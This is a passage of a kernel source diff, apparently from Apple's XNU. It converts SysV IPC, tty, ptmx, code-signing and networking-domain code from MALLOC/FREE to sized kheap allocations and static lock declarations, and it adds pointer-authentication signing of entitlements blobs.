@@ -319,18 +299,14 @@ msginit(__unused void *dummy)
        initted = 1;
 bad:
        if (!initted) {
-               if (msgpool != NULL) {
-                       _FREE(msgpool, M_SHM);
-               }
-               if (msgmaps != NULL) {
-                       FREE(msgmaps, M_SHM);
-               }
-               if (msghdrs != NULL) {
-                       FREE(msghdrs, M_SHM);
-               }
-               if (msqids != NULL) {
-                       FREE(msqids, M_SHM);
-               }
+               kheap_free(KHEAP_DATA_BUFFERS, msgpool,
+                   msginfo.msgmax);
+               kheap_free(KM_SHM, msgmaps,
+                   sizeof(struct msgmap) * msginfo.msgseg);
+               kheap_free(KM_SHM, msghdrs,
+                   sizeof(struct msg) * msginfo.msgtql);
+               kheap_free(KM_SHM, msqids,
+                   sizeof(struct msqid_kernel) * msginfo.msgmni);
        }
        return initted;
 }
@@ -1467,12 +1443,11 @@ msgrcv_nocancel(struct proc *p, struct msgrcv_nocancel_args *uap, user_ssize_t *
        for (len = 0; len < msgsz; len += msginfo.msgssz) {
                size_t tlen;
 
-               /* compare input (size_t) value against restrict (int) value */
-               if (msgsz > (size_t)msginfo.msgssz) {
-                       tlen = msginfo.msgssz;
-               } else {
-                       tlen = msgsz;
-               }
+               /*
+                * copy the full segment, or less if we're at the end
+                * of the message
+                */
+               tlen = MIN(msgsz - len, (size_t)msginfo.msgssz);
                if (next <= -1) {
                        panic("next too low #3");
                }
index cf284cd821d4d28b8ab97cd7e6f8f638d2b9fe0c..f7ab8e39cd569b6a4ed34b9efe312d13c45bf597 100644 (file)
@@ -78,7 +78,7 @@
 #define MPRINTF(a)
 #endif
 
-#define M_SYSVSEM       M_TEMP
+#define KM_SYSVSEM       KHEAP_DEFAULT
 
 
 /* Hard system limits to avoid resource starvation / DOS attacks.
@@ -133,27 +133,12 @@ static int              semu_list_idx = -1;     /* active undo structures */
 struct sem_undo         *semu = NULL;           /* semaphore undo pool */
 
 
-void sysv_sem_lock_init(void);
-static lck_grp_t       *sysv_sem_subsys_lck_grp;
-static lck_grp_attr_t  *sysv_sem_subsys_lck_grp_attr;
-static lck_attr_t      *sysv_sem_subsys_lck_attr;
-static lck_mtx_t        sysv_sem_subsys_mutex;
+static LCK_GRP_DECLARE(sysv_sem_subsys_lck_grp, "sysv_sem_subsys_lock");
+static LCK_MTX_DECLARE(sysv_sem_subsys_mutex, &sysv_sem_subsys_lck_grp);
 
 #define SYSV_SEM_SUBSYS_LOCK() lck_mtx_lock(&sysv_sem_subsys_mutex)
 #define SYSV_SEM_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_sem_subsys_mutex)
 
-
-__private_extern__ void
-sysv_sem_lock_init( void )
-{
-       sysv_sem_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       sysv_sem_subsys_lck_grp = lck_grp_alloc_init("sysv_sem_subsys_lock", sysv_sem_subsys_lck_grp_attr);
-
-       sysv_sem_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&sysv_sem_subsys_mutex, sysv_sem_subsys_lck_grp, sysv_sem_subsys_lck_attr);
-}
-
 static __inline__ user_time_t
 sysv_semtime(void)
 {
@@ -283,8 +268,8 @@ grow_semu_array(int newSize)
 #ifdef SEM_DEBUG
        printf("growing semu[] from %d to %d\n", seminfo.semmnu, newSize);
 #endif
-       MALLOC(newSemu, struct sem_undo *, sizeof(struct sem_undo) * newSize,
-           M_SYSVSEM, M_WAITOK | M_ZERO);
+       newSemu = kheap_alloc(KM_SYSVSEM, sizeof(struct sem_undo) * newSize,
+           Z_WAITOK | Z_ZERO);
        if (NULL == newSemu) {
 #ifdef SEM_DEBUG
                printf("allocation failed.  no changes made.\n");
@@ -298,14 +283,12 @@ grow_semu_array(int newSize)
        }
        /*
         * The new elements (from newSemu[i] to newSemu[newSize-1]) have their
-        * "un_proc" set to 0 (i.e. NULL) by the M_ZERO flag to MALLOC() above,
-        * so they're already marked as "not in use".
+        * "un_proc" set to 0 (i.e. NULL) by the Z_ZERO flag to kheap_alloc
+        * above, so they're already marked as "not in use".
         */
 
        /* Clean up the old array */
-       if (semu) {
-               FREE(semu, M_SYSVSEM);
-       }
+       kheap_free(KM_SYSVSEM, semu, sizeof(struct sem_undo) * seminfo.semmnu);
 
        semu = newSemu;
        seminfo.semmnu = newSize;
@@ -343,9 +326,8 @@ grow_sema_array(int newSize)
 #ifdef SEM_DEBUG
        printf("growing sema[] from %d to %d\n", seminfo.semmni, newSize);
 #endif
-       MALLOC(newSema, struct semid_kernel *,
-           sizeof(struct semid_kernel) * newSize,
-           M_SYSVSEM, M_WAITOK | M_ZERO);
+       newSema = kheap_alloc(KM_SYSVSEM, sizeof(struct semid_kernel) * newSize,
+           Z_WAITOK | Z_ZERO);
        if (NULL == newSema) {
 #ifdef SEM_DEBUG
                printf("allocation failed.  no changes made.\n");
@@ -377,14 +359,13 @@ grow_sema_array(int newSize)
 
        /*
         * The new elements (from newSema[i] to newSema[newSize-1]) have their
-        * "sem_base" and "sem_perm.mode" set to 0 (i.e. NULL) by the M_ZERO
-        * flag to MALLOC() above, so they're already marked as "not in use".
+        * "sem_base" and "sem_perm.mode" set to 0 (i.e. NULL) by the Z_ZERO
+        * flag to kheap_alloc above, so they're already marked as "not in use".
         */
 
        /* Clean up the old array */
-       if (sema) {
-               FREE(sema, M_SYSVSEM);
-       }
+       kheap_free(KM_SYSVSEM, sema,
+           sizeof(struct semid_kernel) * seminfo.semmni);
 
        sema = newSema;
        seminfo.semmni = newSize;
@@ -425,8 +406,8 @@ grow_sem_pool(int new_pool_size)
 #ifdef SEM_DEBUG
        printf("growing sem_pool array from %d to %d\n", seminfo.semmns, new_pool_size);
 #endif
-       MALLOC(new_sem_pool, struct sem *, sizeof(struct sem) * new_pool_size,
-           M_SYSVSEM, M_WAITOK | M_ZERO | M_NULL);
+       new_sem_pool = kheap_alloc(KM_SYSVSEM, sizeof(struct sem) * new_pool_size,
+           Z_WAITOK | Z_ZERO);
        if (NULL == new_sem_pool) {
 #ifdef SEM_DEBUG
                printf("allocation failed.  no changes made.\n");
@@ -453,9 +434,7 @@ grow_sem_pool(int new_pool_size)
        sem_pool = new_sem_pool;
 
        /* clean up the old array */
-       if (sem_free != NULL) {
-               FREE(sem_free, M_SYSVSEM);
-       }
+       kheap_free(KM_SYSVSEM, sem_free, sizeof(struct sem) * seminfo.semmns);
 
        seminfo.semmns = new_pool_size;
 #ifdef SEM_DEBUG
@@ -606,8 +585,7 @@ semundo_adjust(struct proc *p, int *supidx, int semid,
                if (sueptr->une_adjval == 0) {
                        suptr->un_cnt--;
                        *suepptr = sueptr->une_next;
-                       FREE(sueptr, M_SYSVSEM);
-                       sueptr = NULL;
+                       kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo));
                }
                return 0;
        }
@@ -624,8 +602,7 @@ semundo_adjust(struct proc *p, int *supidx, int semid,
        }
 
        /* allocate a new semaphore undo entry */
-       MALLOC(new_sueptr, struct undo *, sizeof(struct undo),
-           M_SYSVSEM, M_WAITOK);
+       new_sueptr = kheap_alloc(KM_SYSVSEM, sizeof(struct undo), Z_WAITOK);
        if (new_sueptr == NULL) {
                return ENOMEM;
        }
@@ -662,7 +639,7 @@ semundo_clear(int semid, int semnum)
                                if (semnum == -1 || sueptr->une_num == semnum) {
                                        suptr->un_cnt--;
                                        *suepptr = sueptr->une_next;
-                                       FREE(sueptr, M_SYSVSEM);
+                                       kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo));
                                        sueptr = *suepptr;
                                        continue;
                                }
@@ -1533,8 +1510,7 @@ semexit(struct proc *p)
 #endif
                        suptr->un_cnt--;
                        suptr->un_ent = sueptr->une_next;
-                       FREE(sueptr, M_SYSVSEM);
-                       sueptr = NULL;
+                       kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo));
                }
        }
 
index 7e778e60d97158e60ad4e25393ec5b2225dded6b..a3a6ea9330897713f2c53339de19b197bd42fc34 100644 (file)
 #if SYSV_SHM
 static int shminit(void);
 
-static lck_grp_t       *sysv_shm_subsys_lck_grp;
-static lck_grp_attr_t  *sysv_shm_subsys_lck_grp_attr;
-static lck_attr_t      *sysv_shm_subsys_lck_attr;
-static lck_mtx_t        sysv_shm_subsys_mutex;
+static LCK_GRP_DECLARE(sysv_shm_subsys_lck_grp, "sysv_shm_subsys_lock");
+static LCK_MTX_DECLARE(sysv_shm_subsys_mutex, &sysv_shm_subsys_lck_grp);
 
 #define SYSV_SHM_SUBSYS_LOCK() lck_mtx_lock(&sysv_shm_subsys_mutex)
 #define SYSV_SHM_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_shm_subsys_mutex)
@@ -183,8 +181,6 @@ struct shminfo shminfo = {
 
 #endif /* __APPLE_API_PRIVATE */
 
-void sysv_shm_lock_init(void);
-
 static __inline__ time_t
 sysv_shmtime(void)
 {
@@ -277,7 +273,7 @@ shm_deallocate_segment(struct shmid_kernel *shmseg)
            shm_handle = shm_handle_next) {
                shm_handle_next = shm_handle->shm_handle_next;
                mach_memory_entry_port_release(shm_handle->shm_object);
-               FREE(shm_handle, M_SHM);
+               kheap_free(KM_SHM, shm_handle, sizeof(struct shm_handle));
        }
        shmseg->u.shm_internal = USER_ADDR_NULL;                /* tunnel */
        size = vm_map_round_page(shmseg->u.shm_segsz,
@@ -421,7 +417,7 @@ shmat(struct proc *p, struct shmat_args *uap, user_addr_t *retval)
                        goto shmat_out;
                }
 
-               MALLOC(shmmap_s, struct shmmap_state *, size, M_SHM, M_WAITOK | M_NULL);
+               shmmap_s = kheap_alloc(KM_SHM, size, Z_WAITOK);
                if (shmmap_s == NULL) {
                        shmat_ret = ENOMEM;
                        goto shmat_out;
@@ -838,7 +834,7 @@ shmget_allocate_segment(struct proc *p, struct shmget_args *uap, int mode,
                        goto out;
                }
 
-               MALLOC(shm_handle, struct shm_handle *, sizeof(struct shm_handle), M_SHM, M_WAITOK);
+               shm_handle = kheap_alloc(KM_SHM, sizeof(struct shm_handle), Z_WAITOK);
                if (shm_handle == NULL) {
                        kret = KERN_NO_SPACE;
                        mach_memory_entry_port_release(mem_object);
@@ -891,7 +887,7 @@ out:
                    shm_handle = shm_handle_next) {
                        shm_handle_next = shm_handle->shm_handle_next;
                        mach_memory_entry_port_release(shm_handle->shm_object);
-                       FREE(shm_handle, M_SHM);
+                       kheap_free(KM_SHM, shm_handle, sizeof(struct shm_handle));
                }
                shmseg->u.shm_internal = USER_ADDR_NULL; /* tunnel */
        }
@@ -1006,7 +1002,7 @@ shmfork(struct proc *p1, struct proc *p2)
                ret = 1;
                goto shmfork_out;
        }
-       MALLOC(shmmap_s, struct shmmap_state *, size, M_SHM, M_WAITOK);
+       shmmap_s = kheap_alloc(KM_SHM, size, Z_WAITOK);
        if (shmmap_s == NULL) {
                ret = 1;
                goto shmfork_out;
@@ -1029,11 +1025,14 @@ static void
 shmcleanup(struct proc *p, int deallocate)
 {
        struct shmmap_state *shmmap_s;
+       size_t size = 0;
+       int nsegs = 0;
 
        SYSV_SHM_SUBSYS_LOCK();
 
        shmmap_s = (struct shmmap_state *)p->vm_shm;
        for (; shmmap_s->shmid != SHMID_SENTINEL; shmmap_s++) {
+               nsegs++;
                if (SHMID_IS_VALID(shmmap_s->shmid)) {
                        /*
                         * XXX: Should the MAC framework enforce
@@ -1043,8 +1042,10 @@ shmcleanup(struct proc *p, int deallocate)
                }
        }
 
-       FREE(p->vm_shm, M_SHM);
-       p->vm_shm = NULL;
+       if (os_add_and_mul_overflow(nsegs, 1, sizeof(struct shmmap_state), &size)) {
+               panic("shmcleanup: p->vm_shm buffer was corrupted\n");
+       }
+       kheap_free(KM_SHM, p->vm_shm, size);
        SYSV_SHM_SUBSYS_UNLOCK();
 }
 
@@ -1084,7 +1085,7 @@ shminit(void)
                        return ENOMEM;
                }
 
-               MALLOC(shmsegs, struct shmid_kernel *, sz, M_SHM, M_WAITOK | M_ZERO);
+               shmsegs = zalloc_permanent(sz, ZALIGN_PTR);
                if (shmsegs == NULL) {
                        return ENOMEM;
                }
@@ -1104,18 +1105,6 @@ shminit(void)
        return 0;
 }
 
-/* Initialize the mutex governing access to the SysV shm subsystem */
-__private_extern__ void
-sysv_shm_lock_init( void )
-{
-       sysv_shm_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       sysv_shm_subsys_lck_grp = lck_grp_alloc_init("sysv_shm_subsys_lock", sysv_shm_subsys_lck_grp_attr);
-
-       sysv_shm_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&sysv_shm_subsys_mutex, sysv_shm_subsys_lck_grp, sysv_shm_subsys_lck_attr);
-}
-
 /* (struct sysctl_oid *oidp, void *arg1, int arg2, \
  *       struct sysctl_req *req) */
 static int
index 14858edc59f8860609db610937c435229409f25e..400a97a948bbcf20d4f8e24e2ac5ac35750b862d 100644 (file)
 0x14000E8      MACH_AMP_RECOMMENDATION_CHANGE
 0x14000EC      MACH_AMP_PERFCTL_POLICY_CHANGE
 0x1400100      MACH_TURNSTILE_KERNEL_CHANGE
+0x140010C      MACH_SET_RT_DEADLINE
+0x1400110      MACH_CANCEL_RT_DEADLINE
 0x1400140      MACH_PSET_AVG_EXEC_TIME
 0x1500000      MACH_MSGID_INVALID
 0x1600000      MTX_SLEEP
 0x313016C      VFS_label_associate_fdesc
 0x3130170      VFS_mount_check_snapshot_mount
 0x3130174      VFS_check_supplemental_signature
+0x3134000      VFS_io_compression_stats
 0x3CF0000      CP_OFFSET_IO
 0x4010004      proc_exit
 0x4010008      force_exit
 0x01ab000c     WORKGROUP_INTERVAL_START
 0x01ab0010     WORKGROUP_INTERVAL_UPDATE
 0x01ab0014     WORKGROUP_INTERVAL_FINISH
+0x01ac0000     HV_GUEST_ENTER
+0x01ac0004     HV_GUEST_ERROR
 0x1e000000     SEC_ENTROPY_READ0
 0x1e000004     SEC_ENTROPY_READ1
 0x1e000008     SEC_ENTROPY_READ2
index fbb861b00521fb0ba0c821e407a4f5b0e23f8cad..ba9f72cfb54a5c3af14f740939b1c692f65750d3 100644 (file)
 #include <kern/waitq.h>
 #include <libkern/section_keywords.h>
 
-static lck_grp_t        *tty_lck_grp;
-static lck_grp_attr_t   *tty_lck_grp_attr;
-static lck_attr_t      *tty_lck_attr;
+static LCK_GRP_DECLARE(tty_lck_grp, "tty");
 
 __private_extern__ int ttnread(struct tty *tp);
 static void     ttyecho(int c, struct tty *tp);
@@ -260,32 +258,6 @@ termios64to32(struct user_termios *in, struct termios32 *out)
 }
 
 
-/*
- * tty_init
- *
- * Initialize the tty line discipline subsystem.
- *
- * Parameters: void
- *
- * Returns:    void
- *
- * Locks:      No ttys can be allocated and no tty locks can be used
- *             until after this function is called
- *
- * Notes:      The intent of this is to set up a log group attribute,
- *             lock group, and loc atribute for subsequent per-tty locks.
- *             This function is called early in bsd_init(), prior to the
- *             console device initialization.
- */
-void
-tty_init(void)
-{
-       tty_lck_grp_attr = lck_grp_attr_alloc_init();
-       tty_lck_grp = lck_grp_alloc_init("tty", tty_lck_grp_attr);
-       tty_lck_attr = lck_attr_alloc_init();
-}
-
-
 /*
  * tty_lock
  *
@@ -3198,14 +3170,14 @@ ttymalloc(void)
 {
        struct tty *tp;
 
-       MALLOC(tp, struct tty *, sizeof(struct tty), M_TTYS, M_WAITOK | M_ZERO);
+       tp = kheap_alloc(KM_TTYS, sizeof(struct tty), Z_WAITOK | Z_ZERO);
        if (tp != NULL) {
                /* XXX: default to TTYCLSIZE(1024) chars for now */
                clalloc(&tp->t_rawq, TTYCLSIZE, 1);
                clalloc(&tp->t_canq, TTYCLSIZE, 1);
                /* output queue doesn't need quoting */
                clalloc(&tp->t_outq, TTYCLSIZE, 0);
-               lck_mtx_init(&tp->t_lock, tty_lck_grp, tty_lck_attr);
+               lck_mtx_init(&tp->t_lock, &tty_lck_grp, LCK_ATTR_NULL);
                klist_init(&tp->t_rsel.si_note);
                klist_init(&tp->t_wsel.si_note);
                tp->t_refcnt = 1;
@@ -3263,8 +3235,8 @@ ttydeallocate(struct tty *tp)
        clfree(&tp->t_rawq);
        clfree(&tp->t_canq);
        clfree(&tp->t_outq);
-       lck_mtx_destroy(&tp->t_lock, tty_lck_grp);
-       FREE(tp, M_TTYS);
+       lck_mtx_destroy(&tp->t_lock, &tty_lck_grp);
+       kheap_free(KM_TTYS, tp, sizeof(struct tty));
 }
 
 
index d4efb5c12f5a7d6741396b8afb53e22b162bce5e..f505e9243127945181f1e4833166b5f0ae16d06e 100644 (file)
@@ -290,13 +290,14 @@ ptmx_get_ioctl(int minor, int open_flag)
                }
                DEVFS_UNLOCK();
 
-               MALLOC(new_ptmx_ioctl, struct ptmx_ioctl *, sizeof(struct ptmx_ioctl), M_TTYS, M_WAITOK | M_ZERO);
+               new_ptmx_ioctl = kheap_alloc(KM_TTYS, sizeof(struct ptmx_ioctl),
+                   Z_WAITOK | Z_ZERO);
                if (new_ptmx_ioctl == NULL) {
                        return NULL;
                }
 
                if ((new_ptmx_ioctl->pt_tty = ttymalloc()) == NULL) {
-                       FREE(new_ptmx_ioctl, M_TTYS);
+                       kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
                        return NULL;
                }
 
@@ -315,7 +316,7 @@ ptmx_get_ioctl(int minor, int open_flag)
                if ((_state.pis_total - _state.pis_free) >= ptmx_max) {
                        ttyfree(new_ptmx_ioctl->pt_tty);
                        DEVFS_UNLOCK();
-                       FREE(new_ptmx_ioctl, M_TTYS);
+                       kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
                        return NULL;
                }
 
@@ -323,39 +324,42 @@ ptmx_get_ioctl(int minor, int open_flag)
                if (_state.pis_free == 0) {
                        struct ptmx_ioctl **new_pis_ioctl_list;
                        struct ptmx_ioctl **old_pis_ioctl_list = NULL;
+                       size_t old_pis_total = 0;
 
                        /* Yes. */
-                       MALLOC(new_pis_ioctl_list, struct ptmx_ioctl **, sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR), M_TTYS, M_WAITOK | M_ZERO);
+                       new_pis_ioctl_list = kheap_alloc(KM_TTYS,
+                           sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR),
+                           Z_WAITOK | Z_ZERO);
                        if (new_pis_ioctl_list == NULL) {
                                ttyfree(new_ptmx_ioctl->pt_tty);
                                DEVFS_UNLOCK();
-                               FREE(new_ptmx_ioctl, M_TTYS);
+                               kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
                                return NULL;
                        }
 
                        /* If this is not the first time, copy the old over */
                        bcopy(_state.pis_ioctl_list, new_pis_ioctl_list, sizeof(struct ptmx_ioctl *) * _state.pis_total);
                        old_pis_ioctl_list = _state.pis_ioctl_list;
+                       old_pis_total = _state.pis_total;
                        _state.pis_ioctl_list = new_pis_ioctl_list;
                        _state.pis_free += PTMX_GROW_VECTOR;
                        _state.pis_total += PTMX_GROW_VECTOR;
-                       if (old_pis_ioctl_list) {
-                               FREE(old_pis_ioctl_list, M_TTYS);
-                       }
+                       kheap_free(KM_TTYS, old_pis_ioctl_list,
+                           sizeof(struct ptmx_ioctl *) * old_pis_total);
                }
 
                /* is minor in range now? */
                if (minor < 0 || minor >= _state.pis_total) {
                        ttyfree(new_ptmx_ioctl->pt_tty);
                        DEVFS_UNLOCK();
-                       FREE(new_ptmx_ioctl, M_TTYS);
+                       kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
                        return NULL;
                }
 
                if (_state.pis_ioctl_list[minor] != NULL) {
                        ttyfree(new_ptmx_ioctl->pt_tty);
                        DEVFS_UNLOCK();
-                       FREE(new_ptmx_ioctl, M_TTYS);
+                       kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
 
                        /* Special error value so we know to redrive the open, we've been raced */
                        return (struct ptmx_ioctl*)-1;
@@ -437,7 +441,7 @@ ptmx_free_ioctl(int minor, int open_flag)
                        devfs_remove(old_ptmx_ioctl->pt_devhandle);
                }
                ttyfree(old_ptmx_ioctl->pt_tty);
-               FREE(old_ptmx_ioctl, M_TTYS);
+               kheap_free(KM_TTYS, old_ptmx_ioctl, sizeof(struct ptmx_ioctl));
        }
 
        return 0;     /* Success */
index 8304c009d34845c7d3e0f10f93319a6245df89f8..320e71ef766264e571e5ceb482d1bf4d2136a931 100644 (file)
@@ -777,6 +777,11 @@ csblob_get_entitlements(struct cs_blob *csblob, void **out_start, size_t *out_le
        }
 
        csblob->csb_hashtype->cs_init(&context);
+       ptrauth_utils_auth_blob_generic(entitlements,
+           ntohl(entitlements->length),
+           OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+           PTRAUTH_ADDR_DIVERSIFY,
+           csblob->csb_entitlements_blob_signature);
        csblob->csb_hashtype->cs_update(&context, entitlements, ntohl(entitlements->length));
        csblob->csb_hashtype->cs_final(computed_hash, &context);
 
@@ -3082,6 +3087,12 @@ ubc_cs_reconstitute_code_signature(struct cs_blob const *blob, vm_size_t optiona
 
        if (blob->csb_entitlements_blob) {
                /* We need to add a slot for the entitlements */
+               ptrauth_utils_auth_blob_generic(blob->csb_entitlements_blob,
+                   ntohl(blob->csb_entitlements_blob->length),
+                   OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                   PTRAUTH_ADDR_DIVERSIFY,
+                   blob->csb_entitlements_blob_signature);
+
                new_blob_size += sizeof(CS_BlobIndex);
                new_blob_size += ntohl(blob->csb_entitlements_blob->length);
        }
@@ -3112,6 +3123,12 @@ ubc_cs_reconstitute_code_signature(struct cs_blob const *blob, vm_size_t optiona
                new_superblob->index[1].type = htonl(CSSLOT_ENTITLEMENTS);
                new_superblob->index[1].offset = htonl((uint32_t)ent_offset);
 
+               ptrauth_utils_auth_blob_generic(blob->csb_entitlements_blob,
+                   ntohl(blob->csb_entitlements_blob->length),
+                   OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                   PTRAUTH_ADDR_DIVERSIFY,
+                   blob->csb_entitlements_blob_signature);
+
                memcpy((void *)(new_blob_addr + ent_offset), blob->csb_entitlements_blob, ntohl(blob->csb_entitlements_blob->length));
 
                new_cd = (CS_CodeDirectory *)(new_blob_addr + cd_offset);
@@ -3242,12 +3259,18 @@ ubc_cs_convert_to_multilevel_hash(struct cs_blob *blob)
        }
 
        /* New Code Directory is ready for use, swap it out in the blob structure */
-       ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size);
+       ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size);
 
        blob->csb_mem_size = new_blob_size;
-       blob->csb_mem_kaddr = new_blob_addr;
+       blob->csb_mem_kaddr = (void *)new_blob_addr;
        blob->csb_cd = cd;
        blob->csb_entitlements_blob = entitlements;
+       if (blob->csb_entitlements_blob != NULL) {
+               blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob,
+                   ntohl(blob->csb_entitlements_blob->length),
+                   OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                   PTRAUTH_ADDR_DIVERSIFY);
+       }
 
        /* The blob has some cached attributes of the Code Directory, so update those */
 
@@ -3301,7 +3324,7 @@ cs_blob_create_validated(
        /* fill in the new blob */
        blob->csb_mem_size = size;
        blob->csb_mem_offset = 0;
-       blob->csb_mem_kaddr = *addr;
+       blob->csb_mem_kaddr = (void *)*addr;
        blob->csb_flags = 0;
        blob->csb_signer_type = CS_SIGNER_TYPE_UNKNOWN;
        blob->csb_platform_binary = 0;
@@ -3339,6 +3362,12 @@ cs_blob_create_validated(
 
                blob->csb_cd = cd;
                blob->csb_entitlements_blob = entitlements; /* may be NULL, not yet validated */
+               if (blob->csb_entitlements_blob != NULL) {
+                       blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob,
+                           ntohl(blob->csb_entitlements_blob->length),
+                           OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                           PTRAUTH_ADDR_DIVERSIFY);
+               }
                blob->csb_hashtype = cs_find_md(cd->hashType);
                if (blob->csb_hashtype == NULL || blob->csb_hashtype->cs_digest_size > sizeof(hash)) {
                        panic("validated CodeDirectory but unsupported type");
@@ -3412,8 +3441,8 @@ cs_blob_free(
 {
        if (blob != NULL) {
                if (blob->csb_mem_kaddr) {
-                       ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size);
-                       blob->csb_mem_kaddr = 0;
+                       ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size);
+                       blob->csb_mem_kaddr = NULL;
                }
                if (blob->csb_entitlements != NULL) {
                        osobject_release(blob->csb_entitlements);
@@ -3547,12 +3576,18 @@ ubc_cs_blob_add(
                        goto out;
                }
 
-               ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size);
+               ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size);
 
-               blob->csb_mem_kaddr = new_mem_kaddr;
+               blob->csb_mem_kaddr = (void *)new_mem_kaddr;
                blob->csb_mem_size = new_mem_size;
                blob->csb_cd = new_cd;
                blob->csb_entitlements_blob = new_entitlements;
+               if (blob->csb_entitlements_blob != NULL) {
+                       blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob,
+                           ntohl(blob->csb_entitlements_blob->length),
+                           OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                           PTRAUTH_ADDR_DIVERSIFY);
+               }
                blob->csb_reconstituted = true;
        }
 #endif
@@ -4379,7 +4414,7 @@ cs_validate_hash(
                }
 
                /* blob data has been released */
-               kaddr = blob->csb_mem_kaddr;
+               kaddr = (vm_offset_t)blob->csb_mem_kaddr;
                if (kaddr == 0) {
                        continue;
                }
index c1f6a3efbf4aa962bf14018beea8801797b9436f..0a6b54ed9edfeead8993785b3d6d9de4aa0a026a 100644 (file)
@@ -100,11 +100,12 @@ static boolean_t domain_draining;
 static void domain_sched_timeout(void);
 static void domain_timeout(void *);
 
-lck_grp_t       *domain_proto_mtx_grp;
-lck_attr_t      *domain_proto_mtx_attr;
-static lck_grp_attr_t   *domain_proto_mtx_grp_attr;
-decl_lck_mtx_data(static, domain_proto_mtx);
-decl_lck_mtx_data(static, domain_timeout_mtx);
+static LCK_GRP_DECLARE(domain_proto_mtx_grp, "domain");
+static LCK_ATTR_DECLARE(domain_proto_mtx_attr, 0, 0);
+static LCK_MTX_DECLARE_ATTR(domain_proto_mtx,
+    &domain_proto_mtx_grp, &domain_proto_mtx_attr);
+static LCK_MTX_DECLARE_ATTR(domain_timeout_mtx,
+    &domain_proto_mtx_grp, &domain_proto_mtx_attr);
 
 u_int64_t _net_uptime;
 u_int64_t _net_uptime_ms;
@@ -196,8 +197,8 @@ init_domain(struct domain *dp)
        VERIFY(dp->dom_flags & DOM_ATTACHED);
 
        if (!(dp->dom_flags & DOM_INITIALIZED)) {
-               lck_mtx_init(&dp->dom_mtx_s, domain_proto_mtx_grp,
-                   domain_proto_mtx_attr);
+               lck_mtx_init(&dp->dom_mtx_s, &domain_proto_mtx_grp,
+                   &domain_proto_mtx_attr);
                dp->dom_mtx = &dp->dom_mtx_s;
                TAILQ_INIT(&dp->dom_protosw);
                if (dp->dom_init != NULL) {
@@ -290,7 +291,7 @@ net_add_domain_old(struct domain_old *odp)
                /* NOTREACHED */
        }
 
-       dp = _MALLOC(sizeof(*dp), M_TEMP, M_WAITOK | M_ZERO);
+       dp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct domain), Z_WAITOK | Z_ZERO);
        if (dp == NULL) {
                /*
                 * There is really nothing better than to panic here,
@@ -360,15 +361,15 @@ net_del_domain_old(struct domain_old *odp)
                TAILQ_FOREACH_SAFE(pp1, &dp1->dom_protosw, pr_entry, pp2) {
                        detach_proto(pp1, dp1);
                        if (pp1->pr_usrreqs->pru_flags & PRUF_OLD) {
-                               FREE(pp1->pr_usrreqs, M_TEMP);
+                               kheap_free(KHEAP_DEFAULT, pp1->pr_usrreqs, sizeof(struct pr_usrreqs));
                        }
                        if (pp1->pr_flags & PR_OLD) {
-                               FREE(pp1, M_TEMP);
+                               kheap_free(KHEAP_DEFAULT, pp1, sizeof(struct protosw));
                        }
                }
 
                detach_domain(dp1);
-               FREE(dp1, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, dp1, sizeof(struct domain));
        } else {
                error = EPFNOSUPPORT;
        }
@@ -485,7 +486,8 @@ net_add_proto_old(struct protosw_old *opp, struct domain_old *odp)
                /* NOTREACHED */
        }
 
-       pru = _MALLOC(sizeof(*pru), M_TEMP, M_WAITOK | M_ZERO);
+       pru = kheap_alloc(KHEAP_DEFAULT, sizeof(struct pr_usrreqs),
+           Z_WAITOK | Z_ZERO);
        if (pru == NULL) {
                error = ENOMEM;
                goto done;
@@ -513,7 +515,7 @@ net_add_proto_old(struct protosw_old *opp, struct domain_old *odp)
        pru->pru_soreceive      = opru->pru_soreceive;
        pru->pru_sopoll         = opru->pru_sopoll;
 
-       pp = _MALLOC(sizeof(*pp), M_TEMP, M_WAITOK | M_ZERO);
+       pp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct protosw), Z_WAITOK | Z_ZERO);
        if (pp == NULL) {
                error = ENOMEM;
                goto done;
@@ -559,12 +561,8 @@ done:
                    "error %d\n", __func__, odp->dom_family,
                    odp->dom_name, opp->pr_protocol, error);
 
-               if (pru != NULL) {
-                       FREE(pru, M_TEMP);
-               }
-               if (pp != NULL) {
